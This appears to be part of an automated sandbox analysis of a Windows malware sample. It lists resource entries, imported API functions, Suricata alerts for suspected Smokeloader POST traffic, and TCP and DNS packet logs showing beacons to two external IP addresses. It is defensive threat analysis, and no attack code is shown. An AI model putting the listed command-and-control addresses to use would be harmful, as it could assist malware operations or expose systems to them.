RT_ICON	0x629a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.5773121387283237
RT_ICON	0x629a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.5773121387283237
RT_ICON	0x62f10	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.3630705394190871
RT_ICON	0x62f10	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.3630705394190871
RT_ICON	0x654b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.4057223264540338
RT_ICON	0x654b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.4057223264540338
RT_ICON	0x66560	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.3950819672131147
RT_ICON	0x66560	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.3950819672131147
RT_ICON	0x66ee8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.46365248226950356
RT_ICON	0x66ee8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.46365248226950356
RT_ICON	0x673c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.4949360341151386
RT_ICON	0x673c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.4949360341151386
RT_ICON	0x68270	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.4629963898916967
RT_ICON	0x68270	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.4629963898916967
RT_ICON	0x68b18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.43641618497109824
RT_ICON	0x68b18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.43641618497109824
RT_ICON	0x69080	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.2795643153526971
RT_ICON	0x69080	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.2795643153526971
RT_ICON	0x6b628	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.2849437148217636
RT_ICON	0x6b628	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.2849437148217636
RT_ICON	0x6c6d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.3086065573770492
RT_ICON	0x6c6d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.3086065573770492
RT_ICON	0x6d058	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.32890070921985815
RT_ICON	0x6d058	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.32890070921985815
RT_ICON	0x6d528	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.3739339019189765
RT_ICON	0x6d528	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.3739339019189765
RT_ICON	0x6e3d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.51985559566787
RT_ICON	0x6e3d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.51985559566787
RT_ICON	0x6ec78	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.5950460829493087
RT_ICON	0x6ec78	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.5950460829493087
RT_ICON	0x6f340	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.6589595375722543
RT_ICON	0x6f340	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.6589595375722543
RT_ICON	0x6f8a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	India	0.4763485477178423
RT_ICON	0x6f8a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	Sri Lanka	0.4763485477178423
RT_ICON	0x71e50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	India	0.4929643527204503
RT_ICON	0x71e50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	Sri Lanka	0.4929643527204503
RT_ICON	0x72ef8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	India	0.4766393442622951
RT_ICON	0x72ef8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	Sri Lanka	0.4766393442622951
RT_ICON	0x73880	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	India	0.5301418439716312
RT_ICON	0x73880	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	Sri Lanka	0.5301418439716312
RT_DIALOG	0x76380	0x58	data			0.8977272727272727
RT_STRING	0x763d8	0x208	AmigaOS bitmap font "o", fc_YSize 24832, 19968 elements, 2nd "a", 3rd	Tamil	India	0.5230769230769231
RT_STRING	0x763d8	0x208	AmigaOS bitmap font "o", fc_YSize 24832, 19968 elements, 2nd "a", 3rd	Tamil	Sri Lanka	0.5230769230769231
RT_STRING	0x765e0	0x2b8	data	Tamil	India	0.47270114942528735
RT_STRING	0x765e0	0x2b8	data	Tamil	Sri Lanka	0.47270114942528735
RT_STRING	0x76898	0x55c	data	Tamil	India	0.44314868804664725
RT_STRING	0x76898	0x55c	data	Tamil	Sri Lanka	0.44314868804664725
RT_ACCELERATOR	0x73d60	0x48	data	Tamil	India	0.8472222222222222
RT_ACCELERATOR	0x73d60	0x48	data	Tamil	Sri Lanka	0.8472222222222222
RT_GROUP_CURSOR	0x74208	0x22	data			1.0294117647058822
RT_GROUP_CURSOR	0x75ee8	0x30	data			0.9375
RT_GROUP_CURSOR	0x760f8	0x22	data			1.0588235294117647
RT_GROUP_ICON	0x60b28	0x68	data	Tamil	India	0.6923076923076923
RT_GROUP_ICON	0x60b28	0x68	data	Tamil	Sri Lanka	0.6923076923076923
RT_GROUP_ICON	0x67350	0x76	data	Tamil	India	0.6779661016949152
RT_GROUP_ICON	0x67350	0x76	data	Tamil	Sri Lanka	0.6779661016949152
RT_GROUP_ICON	0x73ce8	0x76	data	Tamil	India	0.6779661016949152
RT_GROUP_ICON	0x73ce8	0x76	data	Tamil	Sri Lanka	0.6779661016949152
RT_GROUP_ICON	0x6d4c0	0x68	data	Tamil	India	0.7115384615384616
RT_GROUP_ICON	0x6d4c0	0x68	data	Tamil	Sri Lanka	0.7115384615384616
RT_VERSION	0x76120	0x260	data			0.5361842105263158

Imports

DLL	Import
KERNEL32.dll	GetConsoleAliasExesA, CommConfigDialogA, CreateProcessW, ClearCommError, OpenJobObjectA, InterlockedDecrement, GetCurrentProcess, SetEnvironmentVariableW, CreateJobObjectW, SetComputerNameW, GetTickCount, GetNumberFormatA, GetCurrencyFormatA, EnumTimeFormatsA, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, GetTimeFormatW, CreateSemaphoreA, GetModuleFileNameW, CreateActCtxA, GetShortPathNameA, TlsGetValue, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, CreateNamedPipeA, DefineDosDeviceA, GlobalFree, GetTempFileNameA, LoadLibraryA, InterlockedExchangeAdd, GetNumberFormatW, OpenEventA, GetCommMask, GetModuleFileNameA, EnumDateFormatsA, GlobalUnWire, GetShortPathNameW, GetDiskFreeSpaceExA, SetFileAttributesW, LCMapStringW, GetComputerNameA, VerifyVersionInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, HeapAlloc, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, TerminateProcess, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, HeapSize, GetLocaleInfoA, WideCharToMultiByte, GetModuleHandleA, RaiseException, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW
USER32.dll	GetAltTabInfoW
GDI32.dll	GetCharWidthA
WINHTTP.dll	WinHttpOpen

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-18T15:22:29.763458+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.7	49804	58.151.148.90	80	TCP
2024-10-18T15:23:49.602607+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.7	54553	58.151.148.90	80	TCP
2024-10-18T15:24:05.510238+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.7	54554	58.151.148.90	80	TCP
2024-10-18T15:24:26.406018+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.7	54555	58.151.148.90	80	TCP
2024-10-18T15:24:45.117791+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.7	54556	58.151.148.90	80	TCP
2024-10-18T15:25:01.399322+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.7	54558	197.164.156.210	80	TCP
2024-10-18T15:25:20.884779+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.7	54559	197.164.156.210	80	TCP
2024-10-18T15:25:41.854946+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.7	54560	197.164.156.210	80	TCP
2024-10-18T15:25:59.817784+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.7	54561	197.164.156.210	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 18, 2024 15:22:28.579837084 CEST	49804	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:22:28.584777117 CEST	80	49804	58.151.148.90	192.168.2.7
Oct 18, 2024 15:22:28.584846973 CEST	49804	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:22:28.584990025 CEST	49804	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:22:28.585002899 CEST	49804	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:22:28.589891911 CEST	80	49804	58.151.148.90	192.168.2.7
Oct 18, 2024 15:22:28.589905977 CEST	80	49804	58.151.148.90	192.168.2.7
Oct 18, 2024 15:22:29.763225079 CEST	80	49804	58.151.148.90	192.168.2.7
Oct 18, 2024 15:22:29.763458014 CEST	49804	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:22:29.764218092 CEST	49804	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:22:29.769057035 CEST	80	49804	58.151.148.90	192.168.2.7
Oct 18, 2024 15:23:48.000098944 CEST	54553	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:23:48.446846962 CEST	80	54553	58.151.148.90	192.168.2.7
Oct 18, 2024 15:23:48.447144032 CEST	54553	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:23:48.447185040 CEST	54553	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:23:48.449841022 CEST	54553	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:23:48.468591928 CEST	80	54553	58.151.148.90	192.168.2.7
Oct 18, 2024 15:23:48.473803043 CEST	80	54553	58.151.148.90	192.168.2.7
Oct 18, 2024 15:23:49.602498055 CEST	80	54553	58.151.148.90	192.168.2.7
Oct 18, 2024 15:23:49.602607012 CEST	54553	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:23:49.602607012 CEST	54553	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:23:49.610285997 CEST	80	54553	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:03.812517881 CEST	54554	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:03.948026896 CEST	80	54554	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:03.948290110 CEST	54554	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:03.948381901 CEST	54554	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:03.948417902 CEST	54554	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:03.955288887 CEST	80	54554	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:03.955301046 CEST	80	54554	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:05.506835938 CEST	80	54554	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:05.510237932 CEST	54554	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:05.510293961 CEST	54554	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:05.557399035 CEST	80	54554	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:25.298609018 CEST	54555	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:25.304056883 CEST	80	54555	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:25.304147959 CEST	54555	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:25.304286003 CEST	54555	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:25.304306030 CEST	54555	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:25.309086084 CEST	80	54555	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:25.309520960 CEST	80	54555	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:26.405797958 CEST	80	54555	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:26.406018019 CEST	54555	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:26.406018019 CEST	54555	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:26.411293030 CEST	80	54555	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:43.988351107 CEST	54556	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:43.993177891 CEST	80	54556	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:43.993254900 CEST	54556	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:43.993356943 CEST	54556	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:43.993379116 CEST	54556	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:43.998105049 CEST	80	54556	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:43.998426914 CEST	80	54556	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:45.117711067 CEST	80	54556	58.151.148.90	192.168.2.7
Oct 18, 2024 15:24:45.117790937 CEST	54556	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:45.132591963 CEST	54556	80	192.168.2.7	58.151.148.90
Oct 18, 2024 15:24:45.137397051 CEST	80	54556	58.151.148.90	192.168.2.7
Oct 18, 2024 15:25:00.055833101 CEST	54558	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:00.060975075 CEST	80	54558	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:00.061072111 CEST	54558	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:00.061269999 CEST	54558	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:00.061316967 CEST	54558	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:00.066581964 CEST	80	54558	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:00.066978931 CEST	80	54558	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:01.399074078 CEST	80	54558	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:01.399322033 CEST	54558	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:01.399322033 CEST	54558	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:01.419842958 CEST	80	54558	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:19.721496105 CEST	54559	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:19.726476908 CEST	80	54559	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:19.726569891 CEST	54559	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:19.726708889 CEST	54559	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:19.726744890 CEST	54559	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:19.731564999 CEST	80	54559	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:19.731720924 CEST	80	54559	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:20.884648085 CEST	80	54559	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:20.884778976 CEST	54559	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:20.904001951 CEST	54559	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:20.908979893 CEST	80	54559	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:35.270647049 CEST	54560	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:35.275815964 CEST	80	54560	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:35.275938988 CEST	54560	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:35.276091099 CEST	54560	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:35.276127100 CEST	54560	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:35.281045914 CEST	80	54560	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:35.281145096 CEST	80	54560	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:41.854846954 CEST	80	54560	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:41.854945898 CEST	54560	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:41.855129004 CEST	54560	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:41.862173080 CEST	80	54560	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:58.478169918 CEST	54561	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:58.533030033 CEST	80	54561	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:58.533107042 CEST	54561	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:58.533226967 CEST	54561	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:58.533237934 CEST	54561	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:58.558367968 CEST	80	54561	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:58.559928894 CEST	80	54561	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:59.817696095 CEST	80	54561	197.164.156.210	192.168.2.7
Oct 18, 2024 15:25:59.817784071 CEST	54561	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:59.817836046 CEST	54561	80	192.168.2.7	197.164.156.210
Oct 18, 2024 15:25:59.841147900 CEST	80	54561	197.164.156.210	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 18, 2024 15:22:28.390764952 CEST	52814	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:22:28.578092098 CEST	53	52814	1.1.1.1	192.168.2.7
Oct 18, 2024 15:22:29.769346952 CEST	61757	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:22:30.770062923 CEST	61757	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:22:31.775336981 CEST	61757	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:22:33.781574011 CEST	61757	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:22:35.938685894 CEST	53	61757	1.1.1.1	192.168.2.7
Oct 18, 2024 15:22:35.938707113 CEST	53	61757	1.1.1.1	192.168.2.7
Oct 18, 2024 15:22:35.938714981 CEST	53	61757	1.1.1.1	192.168.2.7
Oct 18, 2024 15:22:35.938724041 CEST	53	61757	1.1.1.1	192.168.2.7
Oct 18, 2024 15:22:35.942984104 CEST	56731	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:22:35.952204943 CEST	53	56731	1.1.1.1	192.168.2.7
Oct 18, 2024 15:22:35.955821991 CEST	55641	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:22:36.969189882 CEST	55641	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:22:37.969008923 CEST	55641	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:22:39.969085932 CEST	55641	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:22:42.130131960 CEST	53	55641	1.1.1.1	192.168.2.7
Oct 18, 2024 15:22:42.131140947 CEST	53	55641	1.1.1.1	192.168.2.7
Oct 18, 2024 15:22:42.131154060 CEST	53	55641	1.1.1.1	192.168.2.7
Oct 18, 2024 15:22:42.131164074 CEST	53	55641	1.1.1.1	192.168.2.7
Oct 18, 2024 15:22:48.601748943 CEST	53	57055	162.159.36.2	192.168.2.7
Oct 18, 2024 15:22:49.641024113 CEST	53	52654	1.1.1.1	192.168.2.7
Oct 18, 2024 15:23:49.695633888 CEST	54903	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:23:50.692039967 CEST	54903	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:23:51.704430103 CEST	54903	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:23:53.781002045 CEST	54903	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:23:56.007730007 CEST	53	54903	1.1.1.1	192.168.2.7
Oct 18, 2024 15:23:56.007744074 CEST	53	54903	1.1.1.1	192.168.2.7
Oct 18, 2024 15:23:56.007752895 CEST	53	54903	1.1.1.1	192.168.2.7
Oct 18, 2024 15:23:56.007761002 CEST	53	54903	1.1.1.1	192.168.2.7
Oct 18, 2024 15:23:56.012118101 CEST	59051	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:23:56.028278112 CEST	53	59051	1.1.1.1	192.168.2.7
Oct 18, 2024 15:23:56.063111067 CEST	61261	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:23:57.085745096 CEST	61261	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:23:58.099508047 CEST	61261	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:00.151673079 CEST	61261	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:02.211215973 CEST	53	61261	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:02.211251020 CEST	53	61261	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:02.211282969 CEST	53	61261	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:02.211309910 CEST	53	61261	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:05.513475895 CEST	58117	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:07.202269077 CEST	58117	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:08.207942963 CEST	58117	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:10.210892916 CEST	58117	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:13.556353092 CEST	53	58117	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:13.556402922 CEST	53	58117	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:13.556416035 CEST	53	58117	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:13.556427002 CEST	53	58117	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:13.577419043 CEST	54564	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:13.595170021 CEST	53	54564	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:13.616303921 CEST	64578	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:14.612255096 CEST	64578	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:15.632071972 CEST	64578	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:17.641366005 CEST	64578	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:19.829919100 CEST	53	64578	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:19.829935074 CEST	53	64578	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:19.829947948 CEST	53	64578	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:19.830018997 CEST	53	64578	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:26.419519901 CEST	64650	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:27.422954082 CEST	64650	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:28.423216105 CEST	64650	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:30.444686890 CEST	64650	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:32.593560934 CEST	53	64650	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:32.593571901 CEST	53	64650	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:32.593579054 CEST	53	64650	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:32.593585968 CEST	53	64650	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:32.604671955 CEST	56560	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:32.615677118 CEST	53	56560	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:32.618896961 CEST	57750	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:33.807702065 CEST	57750	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:34.801789999 CEST	57750	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:36.910574913 CEST	57750	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:38.881119013 CEST	53	57750	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:38.881134987 CEST	53	57750	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:38.881155968 CEST	53	57750	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:38.881166935 CEST	53	57750	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:45.265588999 CEST	53040	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:46.268899918 CEST	53040	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:47.271413088 CEST	53040	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:49.282417059 CEST	53040	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:49.310442924 CEST	53	53040	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:49.310632944 CEST	53	53040	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:49.310653925 CEST	53	53040	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:49.310671091 CEST	53	53040	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:49.323482037 CEST	53069	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:49.333623886 CEST	53	53069	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:49.338215113 CEST	49890	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:50.345654011 CEST	49890	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:51.466224909 CEST	49890	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:24:53.434478045 CEST	53	49890	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:53.434560061 CEST	53	49890	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:53.434598923 CEST	53	49890	1.1.1.1	192.168.2.7
Oct 18, 2024 15:24:59.578164101 CEST	52643	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:00.054860115 CEST	53	52643	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:01.403202057 CEST	52028	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:02.407104969 CEST	52028	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:03.406995058 CEST	52028	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:05.422641039 CEST	52028	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:07.605252028 CEST	53	52028	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:07.605292082 CEST	53	52028	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:07.605309010 CEST	53	52028	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:07.605686903 CEST	53	52028	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:07.609453917 CEST	59359	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:07.701316118 CEST	53	59359	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:07.711960077 CEST	61871	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:08.909518957 CEST	61871	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:09.907243013 CEST	61871	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:11.928453922 CEST	61871	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:13.986584902 CEST	53	61871	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:13.986649036 CEST	53	61871	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:13.986691952 CEST	53	61871	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:13.986730099 CEST	53	61871	1.1.1.1	192.168.2.7
